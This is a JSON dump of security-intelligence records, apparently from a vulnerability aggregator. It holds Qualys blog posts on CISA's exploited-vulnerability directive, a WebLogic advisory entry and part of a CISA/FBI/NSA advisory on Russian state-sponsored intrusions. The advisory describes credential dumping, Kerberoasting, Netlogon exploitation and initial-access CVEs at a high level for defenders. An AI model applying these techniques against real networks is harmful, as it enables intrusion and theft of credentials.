have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. 
They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. 
\nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nIn November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps these CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, tagging them with the RTI field \u201cCISA Exploited\u201d. This will remain an ongoing effort, as CISA frequently amends the catalog with the latest CVEs as part of its regular feeds.\n\nFor these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. 
The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022), we recommend searching with QQL (Qualys Query Language); the following query returns the QIDs released by Qualys: **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. 
With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help them comply with the aggressive remediation timelines set by CISA in the directive. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization achieve that compliance. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:44", "description": "A remote code execution vulnerability exists in Oracle WebLogic. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-01T00:00:00", "type": "checkpoint_advisories", "title": "Oracle WebLogic Remote Code Execution (CVE-2020-14882; CVE-2020-14750; CVE-2020-14825; CVE-2020-14883)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14825", "CVE-2020-14882", "CVE-2020-14883"], "modified": "2021-01-21T00:00:00", "id": "CPAI-2020-1138", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-09-23T06:56:14", "description": "### Summary\n\n**Actions Critical Infrastructure Organizations Should Implement to Immediately Strengthen Their Cyber Posture.**\n\n\u2022 Patch all systems. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\u2022 Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).\n\u2022 Use antivirus software.\n\u2022 Develop internal contact lists and surge support.\n\n_**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint Cybersecurity Advisory (CSA)\u2014authored by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA)\u2014is part of our continuing cybersecurity mission to warn organizations of cyber threats and help the cybersecurity community reduce the risk presented by these threats. This CSA provides an overview of Russian state-sponsored cyber operations; commonly observed tactics, techniques, and procedures (TTPs); detection actions; incident response guidance; and mitigations. This overview is intended to help the cybersecurity community reduce the risk presented by these threats.\n\nCISA, the FBI, and NSA encourage the cybersecurity community\u2014especially critical infrastructure network defenders\u2014to adopt a heightened state of awareness and to conduct proactive threat hunting, as outlined in the Detection section. Additionally, CISA, the FBI, and NSA strongly urge network defenders to implement the recommendations listed below and detailed in the Mitigations section. These mitigations will help organizations improve their functional resilience by reducing the risk of compromise or severe business degradation.\n\n 1. **Be prepared**. Confirm reporting processes and minimize personnel gaps in IT/OT security coverage. Create, maintain, and exercise a cyber incident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems are disrupted or need to be taken offline.\n 2. 
**Enhance your organization\u2019s cyber posture**. Follow best practices for identity and access management, protective controls and architecture, and vulnerability and configuration management.\n 3. **Increase organizational vigilance**. Stay current on reporting on this threat. [Subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED>) to CISA\u2019s [mailing list and feeds](<https://www.cisa.gov/uscert/mailing-lists-and-feeds>) to receive notifications when CISA releases information about a security topic or threat.\n\nCISA, the FBI, and NSA encourage critical infrastructure organization leaders to review CISA Insights: [Preparing for and Mitigating Cyber Threats](<https://cisa.gov/sites/default/files/publications/CISA_INSIGHTS-Preparing_For_and_Mitigating_Potential_Cyber_Threats-508C.pdf>) for information on reducing cyber threats to their organization.\n\n### Technical Details\n\nHistorically, Russian state-sponsored advanced persistent threat (APT) actors have used common but effective tactics\u2014including spearphishing, brute force, and exploiting known vulnerabilities against accounts and networks with weak security\u2014to gain initial access to target networks. 
Vulnerabilities known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) FortiGate VPNs\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) Cisco router\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) Oracle WebLogic Server\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) Kibana\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) Zimbra software\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) Exim Simple Mail Transfer Protocol\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) Pulse Secure\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) Citrix\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) Microsoft Exchange\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) VMware (note: this was a zero-day at the time)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) F5 Big-IP\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) Oracle WebLogic\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) Microsoft Exchange (Note: this vulnerability is frequently observed being used in conjunction with [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\nRussian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware. 
The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments\u2014including cloud environments\u2014by using legitimate credentials.\n\nIn some cases, Russian state-sponsored cyber operations against critical infrastructure organizations have specifically targeted operational technology (OT)/industrial control systems (ICS) networks with destructive malware. See the following advisories and alerts for information on historical Russian state-sponsored cyber-intrusion campaigns and customized malware that have targeted ICS:\n\n * ICS Advisory [ICS Focused Malware \u2013 Havex](<https://us-cert.cisa.gov/ics/advisories/ICSA-14-178-01>)\n * ICS Alert [Ongoing Sophisticated Malware Campaign Compromising ICS (Update E)](<https://us-cert.cisa.gov/ics/alerts/ICS-ALERT-14-281-01B>)\n * ICS Alert [Cyber-Attack Against Ukrainian Critical Infrastructure](<https://us-cert.cisa.gov/ics/alerts/IR-ALERT-H-16-056-01>)\n * Technical Alert [CrashOverride Malware](<https://us-cert.cisa.gov/ncas/alerts/TA17-163A>)\n * CISA MAR [HatMan: Safety System Targeted Malware (Update B)](<https://us-cert.cisa.gov/ics/MAR-17-352-01-HatMan-Safety-System-Targeted-Malware-Update-B>)\n * CISA ICS Advisory [Schneider Electric Triconex Tricon (Update B)](<https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-02>)\n\nRussian state-sponsored APT actors have used sophisticated cyber capabilities to target a variety of U.S. and international critical infrastructure organizations, including those in the Defense Industrial Base as well as the Healthcare and Public Health, Energy, Telecommunications, and Government Facilities Sectors. High-profile cyber activity publicly attributed to Russian state-sponsored APT actors by U.S. 
government reporting and legal actions includes:\n\n * **Russian state-sponsored APT actors targeting state, local, tribal, and territorial (SLTT) governments and aviation networks, September 2020, through at least December 2020.** Russian state-sponsored APT actors targeted dozens of SLTT government and aviation networks. The actors successfully compromised networks and exfiltrated data from multiple victims.\n * **Russian state-sponsored APT actors\u2019 global Energy Sector intrusion campaign, 2011 to 2018.** These Russian state-sponsored APT actors conducted a multi-stage intrusion campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data.\n * **Russian state-sponsored APT actors\u2019 campaign against Ukrainian critical infrastructure, 2015 and 2016.** Russian state-sponsored APT actors conducted a cyberattack against Ukrainian energy distribution companies, leading to multiple companies experiencing unplanned power outages in December 2015. The actors deployed 